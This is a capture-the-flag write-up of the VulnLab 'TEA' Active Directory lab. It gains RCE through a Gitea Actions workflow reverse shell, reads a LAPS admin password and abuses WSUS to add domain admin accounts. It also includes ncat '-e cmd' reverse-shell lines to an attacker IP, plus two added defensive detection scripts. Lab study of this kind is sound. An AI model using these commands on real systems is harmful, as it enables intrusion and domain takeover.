Here are my notes on TEA from VulnLab.
TEA:
DC: 10.10.170.37
Nmap scan report for 10.10.170.37
Host is up, received user-set (0.12s latency).
Scanned at 2024-11-14 10:44:56 EST for 1025s
Not shown: 65515 filtered tcp ports (no-response)
PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack ttl 127 Simple DNS Plus
88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2024-11-14 16:00:09Z)
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
┌──(root㉿kali)-[/home/…/VL/TEA/results/10.10.170.38]
└─# rpcclient 10.10.170.37 -U "guest%guest" -c "enumdomusers;quit"
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
┌──(root㉿kali)-[/home/…/VL/TEA/results/10.10.170.38]
└─# rpcclient 10.10.170.37 -U "" -c "enumdomusers;quit"
Password for [WORKGROUP\]:
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: tea.vl0., Site: Default-First-Site-Name)
ldapv3 = account required.
445/tcp open microsoft-ds? syn-ack ttl 127
smbclient -N -L 10.10.170.37
Anonymous login successful
Sharename Type Comment
--------- ---- -------
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.170.37 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
#EMPTY.
#FROM POST-EXPLOITATION of SRV:
.\WSUSpendu.ps1 -Inject -PayloadFile C:\_install\PsExec64.exe -PayloadArgs '-accepteula -s -d cmd.exe /c "net user qwop Password123@ /add && net localgroup administrators qwop /add"' -ComputerName dc.tea.vl
.\WSUSpendu.ps1 -Inject -PayloadFile C:\_install\PsExec64.exe -PayloadArgs '-accepteula -s -d cmd.exe /c "net user qwop2 Password1234@! /add && net localgroup administrators qwop2 /add"' -ComputerName dc.tea.vl
#Wait at least 5 to 10 minutes.
┌──(root㉿kali)-[/home/kali/VL]
└─# crackmapexec smb 10.10.160.85 -u 'qwop' -p 'Password123@'
SMB 10.10.160.85 445 DC [*] Windows 10.0 Build 20348 x64 (name:DC) (domain:tea.vl) (signing:True) (SMBv1:False)
SMB 10.10.160.85 445 DC [+] tea.vl\qwop:Password123@ (Pwn3d!)
WORKS !
https://dan-feliciano.com/2024/08/26/tea/
sudo rlwrap psexec.py qwop:'Password123@'@10.10.160.85
┌──(root㉿kali)-[/home/kali/VL]
└─# sudo rlwrap psexec.py qwop:'Password123@'@10.10.160.85
/usr/local/bin/psexec.py:4: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
__import__('pkg_resources').run_script('impacket==0.9.24.dev1+20210704.162046.29ad5792', 'psexec.py')
Impacket v0.9.24.dev1+20210704.162046.29ad5792 - Copyright 2021 SecureAuth Corporation
[*] Requesting shares on 10.10.160.85.....
[*] Found writable share ADMIN$
[*] Uploading file adHtpSgC.exe
[*] Opening SVCManager on 10.10.160.85.....
[*] Creating service PNmk on 10.10.160.85.....
[*] Starting service PNmk.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.20348.2159]
(c) Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
nt authority\system
C:\Windows\system32>hostname
DC
SYSTEM-SHELL !
C:\Users\Administrator\Desktop>whoami
nt authority\system
C:\Users\Administrator\Desktop>hostname
DC
C:\Users\Administrator\Desktop>dir
Volume in drive C has no label.
Volume Serial Number is D815-5CEA
Directory of C:\Users\Administrator\Desktop
12/24/2023 05:51 AM <DIR> .
12/19/2023 08:58 AM <DIR> ..
12/24/2023 05:51 AM 36 root.txt
1 File(s) 36 bytes
2 Dir(s) 8,278,077,440 bytes free
C:\Users\Administrator\Desktop>type root.txt
VL{REDIRECTED}
ROOT.TXT: VL{REDIRECTED}
464/tcp open kpasswd5? syn-ack ttl 127
593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped syn-ack ttl 127
3269/tcp open tcpwrapped syn-ack ttl 127
3389/tcp open ms-wbt-server syn-ack ttl 127 Microsoft Terminal Services
| ssl-cert: Subject: commonName=DC.tea.vl
| Issuer: commonName=DC.tea.vl
|_ssl-date: 2024-11-14T16:01:54+00:00; -1s from scanner time.
| rdp-ntlm-info:
| Target_Name: TEA
| NetBIOS_Domain_Name: TEA
| NetBIOS_Computer_Name: DC
| DNS_Domain_Name: tea.vl
| DNS_Computer_Name: DC.tea.vl
| DNS_Tree_Name: tea.vl
| Product_Version: 10.0.20348
|_ System_Time: 2024-11-14T16:01:13+00:00
9389/tcp open mc-nmf syn-ack ttl 127 .NET Message Framing
49664/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49668/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49669/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
56514/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
56517/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
56525/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
56547/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
56793/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2016 (85%)
OS CPE: cpe:/o:microsoft:windows_server_2016
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
Aggressive OS guesses: Microsoft Windows Server 2016 (85%)
No exact OS matches for host (test conditions non-ideal).
Uptime guess: 0.013 days (since Thu Nov 14 10:42:49 2024)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=256 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: -1s, deviation: 0s, median: -1s
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 32622/tcp): CLEAN (Timeout)
| Check 2 (port 58611/tcp): CLEAN (Timeout)
| Check 3 (port 16334/udp): CLEAN (Timeout)
| Check 4 (port 59709/udp): CLEAN (Timeout)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-security-mode:
| 311:
|_ Message signing enabled and required
| smb2-time:
| date: 2024-11-14T16:01:15
|_ start_date: N/A
TRACEROUTE (using port 3389/tcp)
HOP RTT ADDRESS
1 123.98 ms 10.8.0.1
2 125.24 ms 10.10.170.37
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Nov 14 11:02:01 2024 -- 1 IP address (1 host up) scanned in 1029.08 seconds
SRV: 10.10.170.38
Nmap scan report for 10.10.170.38
Host is up, received user-set (0.13s latency).
Scanned at 2024-11-14 10:44:56 EST for 1162s
Not shown: 65527 filtered tcp ports (no-response)
PORT STATE SERVICE REASON VERSION
80/tcp open http syn-ack ttl 127 Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
|_http-title: IIS Windows Server
#EMPTY and nothing interesting.
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
┌──(root㉿kali)-[/home/…/VL/TEA/results/10.10.170.38]
└─# rpcclient 10.10.170.38 -U "" -c "enumdomusers;quit"
Password for [WORKGROUP\]:
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
┌──(root㉿kali)-[/home/…/VL/TEA/results/10.10.170.38]
└─# rpcclient 10.10.170.38 -U "guest%guest" -c "enumdomusers;quit"
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
445/tcp open microsoft-ds? syn-ack ttl 127
┌──(root㉿kali)-[/home/…/VL/TEA/results/10.10.170.38]
└─# smbclient -N -L 10.10.170.38
session setup failed: NT_STATUS_ACCESS_DENIED
3000/tcp open ppp? syn-ack ttl 127
| fingerprint-strings:
| GenericLines, Help, RTSPRequest:
| HTTP/1.1 400 Bad Request
| Content-Type: text/plain; charset=utf-8
| Connection: close
| Request
| GetRequest:
| HTTP/1.0 200 OK
-Gitea
-Gitea version 1.21.2
-Register an account and check out explore repos as usual.
qwop:qwopqwop
The Gitea explore page is empty, meaning there are no interesting repos (no repos at all).
gitea@tea.vl = Administrator - User ? -#NOPE !
NO ASREPROASTING and creds spraying = NOPE and DON'T BOTHER !
Do users of the Git site (Gitea especially) have a runner available under the Actions section of User Settings?
It shows up like this: Idle 1 SRV v0.2.6 Global windows-latest now
Gitea CI/CD Runner:
-Lets you compile a program without downloading it onto your own computer; the build runs within the Git site instead, for convenience's sake.
-CI/CD = Continuous Integration / Continuous Delivery.
For RCE:
1) Create a repository as a user in Gitea site as usual.
2) Check the settings of the repository and enable Actions (the "Enable Repository Actions" option).
3) Build a yaml script out of this sample script:
https://blog.gitea.com/feature-preview-gitea-actions/
# .gitea/workflows/build.yaml #This will be our filename for the repository created.
name: Gitea Actions Demo
run-name: ${{ github.actor }} is testing out Gitea Actions 🚀
on: [push]
jobs:
  Explore-Gitea-Actions:
    runs-on: ubuntu-latest
    steps:
      - run: echo "🎉 The job was automatically triggered by a ${{ github.event_name }} event."
      - run: echo "🐧 This job is now running on a ${{ runner.os }} server hosted by Gitea!"
      - run: echo "🔎 The name of your branch is ${{ github.ref }} and your repository is ${{ github.repository }}."
      - name: Check out repository code
        uses: actions/checkout@v3
      - run: echo "💡 The ${{ github.repository }} repository has been cloned to the runner."
      - run: echo "🖥️ The workflow is now ready to test your code on the runner."
      - name: List files in the repository
        run: |
          ls ${{ github.workspace }}
      - run: echo "🍏 This job's status is ${{ job.status }}."
Modified for this case:
name: Gitea Actions Demo
run-name: ${{ github.actor }} is testing out Gitea Actions 🚀
on: [push]
jobs:
  Explore-Gitea-Actions:
    runs-on: windows-latest
    steps:
      - run: powershell.exe -c "whoami"
revshells.com on powershell base64 as usual:
name: Gitea Actions Demo
run-name: ${{ github.actor }} is testing out Gitea Actions 🚀
on: [push]
jobs:
  Explore-Gitea-Actions:
    runs-on: windows-latest
    steps:
      - run: powershell -e "<base64 payload removed>"
Commit the changes to trigger the workflow and gain a shell:
┌──(root㉿kali)-[/home/kali/VL]
└─# sudo rlwrap nc -lnvp 1234
listening on [any] 1234 ...
connect to [10.8.0.71] from (UNKNOWN) [10.10.170.38] 53887
whoami
tea\thomas.wallace
PS C:\Users\thomas.wallace\.cache\act\06b666a5bf409728\hostexecutor> whoami
tea\thomas.wallace
USER-SHELL !
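The foothold above needed two things from the Gitea server: open self-registration and Actions being usable by any repository owner. As an added example (not part of the original notes and not Gitea's own code), this audits an app.ini for that combination. The sample files are constructed, `audit_app_ini` is a hypothetical helper, and treating Actions as enabled when `[actions] ENABLED` is absent is this example's assumption for the 1.21.x version seen in the notes.

```python
import configparser

# Constructed app.ini fragments (not taken from the lab host).
WEAK_INI = """\
APP_NAME = Gitea: Git with a cup of tea
RUN_MODE = prod

[server]
HTTP_PORT = 3000

[service]
DISABLE_REGISTRATION = false
"""

HARDENED_INI = WEAK_INI.replace("DISABLE_REGISTRATION = false",
                                "DISABLE_REGISTRATION = true") + """
[actions]
ENABLED = false
"""


def audit_app_ini(text, actions_default=True):
    """Return findings for the open-registration + Actions combination.

    actions_default is the value assumed when [actions] ENABLED is absent;
    True is this example's assumption for the 1.21.x line seen in the notes.
    """
    cp = configparser.ConfigParser(interpolation=None, strict=False,
                                   delimiters=("=",))
    cp.optionxform = str  # keep Gitea's upper-case key names
    # app.ini starts with keys outside any section, which configparser
    # rejects, so park them under a synthetic header.
    cp.read_string("[__root__]\n" + text)

    reg_off = cp.getboolean("service", "DISABLE_REGISTRATION", fallback=False)
    manual = cp.getboolean("service", "REGISTER_MANUAL_CONFIRM", fallback=False)
    actions = cp.getboolean("actions", "ENABLED", fallback=actions_default)

    findings = []
    open_reg = not reg_off and not manual
    if open_reg:
        findings.append("registration: anyone reaching the site can create an account")
    if actions:
        findings.append("actions: repository workflows can be enabled by repo owners")
    if open_reg and actions:
        findings.append("combined: a self-registered user can run jobs on any global runner")
    return findings


if __name__ == "__main__":
    for name, ini in (("weak", WEAK_INI), ("hardened", HARDENED_INI)):
        print(name, audit_app_ini(ini))
```

app.ini does not show the runner side seen in the shell above (a global runner executing jobs directly on the host as a domain user), so that has to be reviewed on the runner itself.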
https://bushidosan.com/posts/vl-tea/
PS C:\Users\thomas.wallace\Desktop> whoami
tea\thomas.wallace
PS C:\Users\thomas.wallace\Desktop> hostname
SRV
PS C:\Users\thomas.wallace\Desktop> dir
Directory: C:\Users\thomas.wallace\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 12/24/2023 5:39 AM 36 flag.txt
PS C:\Users\thomas.wallace\Desktop> type flag.txt
VL{REDIRECTED}
FLAG.TXT: VL{REDIRECTED}
PRIV ESC:
PS C:\> dir
Directory: C:\
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 12/20/2023 2:48 AM Gitea
d----- 12/19/2023 10:02 AM inetpub
d----- 5/8/2021 1:20 AM PerfLogs
d-r--- 12/23/2023 12:32 PM Program Files
d----- 5/8/2021 2:40 AM Program Files (x86)
d-r--- 12/20/2023 2:35 AM Users
d----- 12/29/2023 2:37 AM Windows
d----- 12/19/2023 10:05 AM WSUS-Updates #Interesting ?
Use WinPEAS:
#NOPE.
ncat.exe -l -p 4444 > BloodHound.zip
nc -w 3 10.10.223.166 4444 < BloodHound.zip
#NO BloodHound Data.
PS C:\> ls -force
Directory: C:\
Mode LastWriteTime Length Name
---- ------------- ------ ----
d--hs- 12/24/2023 5:36 AM $Recycle.Bin
d--h-- 12/19/2023 10:26 AM $WinREAgent
d--hsl 12/19/2023 5:49 PM Documents and Settings
d----- 12/20/2023 2:48 AM Gitea
d----- 12/19/2023 10:02 AM inetpub
d----- 5/8/2021 1:20 AM PerfLogs
d-r--- 12/23/2023 12:32 PM Program Files
d----- 5/8/2021 2:40 AM Program Files (x86)
d--h-- 12/23/2023 12:40 PM ProgramData
d--hs- 12/19/2023 5:49 PM Recovery
d--hs- 12/19/2023 5:48 PM System Volume Information
d-r--- 12/20/2023 2:35 AM Users
d----- 12/29/2023 2:37 AM Windows
d----- 12/19/2023 10:05 AM WSUS-Updates
d--h-- 12/24/2023 5:38 AM _install #Interesting.
-a-hs- 11/14/2024 10:38 AM 12288 DumpStack.log.tmp
-a-hs- 11/14/2024 10:38 AM 1207959552 pagefile.sys
PS C:\> cd _install
PS C:\_install> dir
Directory: C:\_install
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 12/24/2023 5:37 AM 1118208 LAPS.x64.msi
-a---- 12/24/2023 5:37 AM 641378 LAPS_OperationsGuide.docx
-a---- 10/22/2023 6:03 AM 833472 PsExec64.exe
-a---- 12/24/2023 5:38 AM 535984 PsInfo64.exe
Powershell:
Get-LapsADPassword -Identity srv
Get-LapsADPassword -Identity srv -AsPlainText
PS C:\_install> Get-LapsADPassword -Identity srv -AsPlainText
ComputerName : SRV
DistinguishedName : CN=SRV,OU=Servers,DC=tea,DC=vl
Account : Administrator
Password : rpdNL5)4r1TH48
PasswordUpdateTime : 11/14/2024 10:48:48 AM
ExpirationTimestamp : 12/14/2024 10:48:48 AM
Source : EncryptedPassword
DecryptionStatus : Success
AuthorizedDecryptor : TEA\Server Administration
Administrator SHELL !
ls -Force
dir -Force
sudo rlwrap psexec.py administrator:'rpdNL5)4r1TH48'@10.10.144.102
┌──(root㉿kali)-[/home/kali/VL]
└─# sudo rlwrap psexec.py administrator:'rpdNL5)4r1TH48'@10.10.144.102
/usr/local/bin/psexec.py:4: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
__import__('pkg_resources').run_script('impacket==0.9.24.dev1+20210704.162046.29ad5792', 'psexec.py')
Impacket v0.9.24.dev1+20210704.162046.29ad5792 - Copyright 2021 SecureAuth Corporation
[*] Requesting shares on 10.10.144.102.....
[*] Found writable share ADMIN$
[*] Uploading file exrxmiuQ.exe
[*] Opening SVCManager on 10.10.144.102.....
[*] Creating service DJWu on 10.10.144.102.....
[*] Starting service DJWu.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.20348.2159]
(c) Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
nt authority\system
C:\Windows\system32>hostname
SRV
SYSTEM-SHELL !
C:\Users\Administrator\Desktop>whoami
nt authority\system
C:\Users\Administrator\Desktop>hostname
SRV
C:\Users\Administrator\Desktop>dir
Volume in drive C has no label.
Volume Serial Number is 9E5B-4149
Directory of C:\Users\Administrator\Desktop
12/24/2023 05:39 AM <DIR> .
12/19/2023 01:24 PM <DIR> ..
12/24/2023 05:39 AM 36 flag.txt
1 File(s) 36 bytes
2 Dir(s) 11,824,533,504 bytes free
C:\Users\Administrator\Desktop>type flag.txt
VL{REDIRECTED}
FLAG.TXT: VL{REDIRECTED}
POST-EXPLOITATION:
SharpWSUS.exe inspect
./SharpWSUS.exe inspect
SharpWSUS.exe create /payload:"C:\_install\PsExec64.exe" /args:"-accepteula -s -d C:\Users\thomas.wallace\ncat.exe -nv 10.8.0.71 5555 -e cmd" /title:"Update"
./SharpWSUS.exe create /payload:"C:\_install\PsExec64.exe" /args:"-accepteula -s -d C:\Users\thomas.wallace\ncat.exe -nv 10.8.0.71 5555 -e cmd" /title:"Update"
SharpWSUS.exe approve /updateid:<UPDATE_ID> /computername:dc.tea.vl /groupname:"User_Group"
./SharpWSUS.exe approve /updateid:<UPDATE_ID> /computername:dc.tea.vl /groupname:"User_Group"
SharpWSUS.exe approve /updateid:f532ca23-f7a1-42af-93d7-8a48f54c3fb4 /computername:dc.tea.vl /groupname:"User_Group"
SharpWSUS.exe create /payload:"C:\_install\PsExec64.exe" /args:"-accepteula -s -d cmd.exe /c " net user qwop P@assword123! /add "" /title:"Updating"
SharpWSUS.exe approve /updateid:f552bfa8-6c0a-4a81-95b0-006134eea709 /computername:dc.tea.vl /groupname:"qwop2"
.\WSUSpendu.ps1 -Inject -PayloadFile C:\_install\PsExec64.exe -PayloadArgs '-accepteula -s -d cmd.exe /c "net user qwop Password123@ /add && net localgroup administrators qwop /add"' -ComputerName dc.tea.vl
.\WSUSpendu.ps1 -Inject -PayloadFile C:\_install\PsExec64.exe -PayloadArgs '-accepteula -s -d cmd.exe /c "net user qwop2 Password1234@! /add && net localgroup administrators qwop2 /add"' -ComputerName dc.tea.vl
#Wait at least 5 to 10 minutes.
┌──(root㉿kali)-[/home/kali/VL]
└─# crackmapexec smb 10.10.160.85 -u 'qwop' -p 'Password123@'
SMB 10.10.160.85 445 DC [*] Windows 10.0 Build 20348 x64 (name:DC) (domain:tea.vl) (signing:True) (SMBv1:False)
SMB 10.10.160.85 445 DC [+] tea.vl\qwop:Password123@ (Pwn3d!)
WORKS !
https://dan-feliciano.com/2024/08/26/tea/
C:\_install\PsExec64.exe -accepteula -s -d C:\Users\thomas.wallace\ncat.exe -nv 10.8.0.71 5555 -e cmd
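Seen from the DC's event logs, the WSUS-delivered `net user ... /add` plus `net localgroup administrators ... /add` and the later psexec.py sessions leave a correlatable trail. As an added example (not part of the original notes), this runs two detections over constructed event records: account creation (4720) followed by an Administrators group add (4732), and a service install (7045) shaped like the `PNmk` / `adHtpSgC.exe` pair in the psexec.py output. The record layout, the SIDs, the five-minute window and the `%systemroot%` image path are assumptions of this example.

```python
import re
from datetime import datetime, timedelta

ADMINS_SID = "S-1-5-32-544"      # well-known SID of the built-in Administrators group
WINDOW = timedelta(minutes=5)    # correlation window (assumed)

# Constructed records; field names follow events 4720, 4732 and 7045.
EVENTS = [
    {"id": 4720, "time": "2024-11-14T17:10:02", "TargetUserName": "qwop",
     "TargetSid": "S-1-5-21-1-2-3-1601", "SubjectUserSid": "S-1-5-18"},
    {"id": 4732, "time": "2024-11-14T17:10:03", "TargetSid": ADMINS_SID,
     "MemberSid": "S-1-5-21-1-2-3-1601", "SubjectUserSid": "S-1-5-18"},
    {"id": 4720, "time": "2024-11-14T09:00:00", "TargetUserName": "new.hire",
     "TargetSid": "S-1-5-21-1-2-3-1602", "SubjectUserSid": "S-1-5-21-1-2-3-500"},
    {"id": 7045, "time": "2024-11-14T17:25:40", "ServiceName": "PNmk",
     "ImagePath": r"%systemroot%\adHtpSgC.exe"},
    {"id": 7045, "time": "2024-11-14T17:30:00", "ServiceName": "BITS",
     "ImagePath": r"C:\Windows\System32\svchost.exe -k netsvcs"},
]

SVC_NAME = re.compile(r"[A-Za-z]{4}")
SVC_PATH = re.compile(r"(%systemroot%|[a-z]:\\windows)\\[a-z]{8}\.exe", re.I)


def _ts(event):
    return datetime.fromisoformat(event["time"])


def new_admin_accounts(events):
    """Accounts created (4720) then added to Administrators (4732) within WINDOW."""
    created = {e["TargetSid"]: e for e in events if e["id"] == 4720}
    hits = []
    for e in events:
        if e["id"] != 4732 or e["TargetSid"] != ADMINS_SID:
            continue
        c = created.get(e["MemberSid"])
        if c and timedelta(0) <= _ts(e) - _ts(c) <= WINDOW:
            hits.append({"account": c["TargetUserName"],
                         "by_system": c["SubjectUserSid"] == "S-1-5-18"})
    return hits


def random_named_services(events):
    """7045 installs shaped like the psexec.py runs in the notes:
    4-letter service name, 8-letter .exe directly under the Windows directory."""
    return [e["ServiceName"] for e in events if e["id"] == 7045
            and SVC_NAME.fullmatch(e["ServiceName"])
            and SVC_PATH.fullmatch(e["ImagePath"].strip('"'))]


if __name__ == "__main__":
    print(new_admin_accounts(EVENTS))
    print(random_named_services(EVENTS))
```

The `by_system` flag matters here because PsExec64.exe was launched with `-s`, so the account creation is attributed to SYSTEM rather than to an administrator's own logon.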
[SNIP]
| Set-Cookie: _csrf=YkBLpAsw-zGv8YspwU1Zn8JRPFc6MTczMTU5OTkzNTcyMDQ1MzEwMA; Path=/; Max-Age=86400; HttpOnly; SameSite=Lax
| X-Frame-Options: SAMEORIGIN
| Date: Thu, 14 Nov 2024 15:58:56 GMT
| <!DOCTYPE html>
| <html lang="en-US" class="theme-auto">
| <head>
| <meta name="viewport" content="width=device-width, initial-scale=1">
| <title>Gitea: Git with a cup of tea</title>
[SNIP]
3389/tcp open ms-wbt-server syn-ack ttl 127 Microsoft Terminal Services
| ssl-cert: Subject: commonName=SRV.tea.vl
| Issuer: commonName=SRV.tea.vl
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
[SNIP]
|_ssl-date: 2024-11-14T16:04:16+00:00; -1s from scanner time.
| rdp-ntlm-info:
| Target_Name: TEA
| NetBIOS_Domain_Name: TEA
| NetBIOS_Computer_Name: SRV
| DNS_Domain_Name: tea.vl
| DNS_Computer_Name: SRV.tea.vl
| DNS_Tree_Name: tea.vl
| Product_Version: 10.0.20348
|_ System_Time: 2024-11-14T16:03:36+00:00
8530/tcp open http syn-ack ttl 127 Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
|_http-title: Site doesn't have a title.
#DON'T BOTHER !
8530/tcp open http syn-ack ttl 127 Microsoft IIS httpd 10.0
|_http-chrono: Request times for /; avg: 376.95ms; min: 316.68ms; max: 477.98ms
| http-enum:
|_ /inventory/: Potentially interesting folder
#NOPE.
8531/tcp open unknown syn-ack ttl 127
49671/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
Host script results:
|_clock-skew: mean: -1s, deviation: 0s, median: -1s
| smb2-time:
| date: 2024-11-14T16:03:36
|_ start_date: N/A
| smb2-security-mode:
| 311:
|_ Message signing enabled but not required
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 44948/tcp): CLEAN (Timeout)
| Check 2 (port 47922/tcp): CLEAN (Timeout)
| Check 3 (port 51793/udp): CLEAN (Timeout)
| Check 4 (port 34411/udp): CLEAN (Timeout)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
TRACEROUTE (using port 80/tcp)
HOP RTT ADDRESS
1 122.78 ms 10.8.0.1
2 127.66 ms 10.10.170.38
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Nov 14 11:04:18 2024 -- 1 IP address (1 host up) scanned in 1166.22 seconds
